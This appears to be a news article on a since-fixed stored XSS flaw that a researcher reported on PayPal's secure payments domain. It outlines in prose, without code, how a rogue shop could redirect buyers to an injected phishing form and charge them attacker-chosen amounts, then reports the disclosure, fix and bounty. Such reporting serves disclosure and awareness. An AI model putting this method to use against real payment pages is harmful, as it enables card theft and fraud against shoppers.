As it sounds, the domain is used to buy products from any online shopping website by making secure online payments. It allows the buyers to pay with their payment cards or PayPal accounts, eliminating the need to capture or store sensitive payment information. However, it is possible for an attacker to set up a disguised online store or illegally seize a legal shopping website, to fool users into providing their personal and financial details. According to Hegazy’s blog post, the susceptibility was found only on the “https://securepayments.paypal.com”domain, used to process commercial transactions. Taking advantage of this imperfection, an attacker would have been able to introduce his own payment forms in the page’s HTML, that would have let him to intercept the user’s private financial information in clear text. Since PayPal regularly asks users to enter credit card numbers, card expiration dates, CSC codes, and even names, users would have found it very difficult to notice anything different when asked for these details. How the Stored XSS Attack Works? In his blog post, Hegazy describes a step by step process that provides a detailed explanation of the attack.

An attacker requires to set up a rogue shopping site or hijack any legitimate shopping site Now make changes to the “CheckOut” button with a URL designed to exploit the XSS vulnerability Whenever Paypal users browse the malformed shopping website, and click on “CheckOut” button to Pay with their Paypal account, they’ll be redirected to the Secure Payments page The page actually displays a phishing page where the victims are asked to enter their payment card information to complete the purchase Now on clicking the Submit Payment Button, instead of paying the product price (let’s say $100), the Paypal user will pay the attacker amount of attacker’s choice

Video Demonstration You can watch the video here where the researcher has also provided a proof-of-concept (PoC) video.

Hegazy disclosed the security vulnerability to the PayPal security team on June 19th, which was confirmed by the team and was fixed on August 25th, which was two days ago. According to the PayPal bug bounty program, Mr. Hegazy was rewarded $750 (€665) for his discovery, which is the company’s maximum bug bounty payout for XSS vulnerabilities.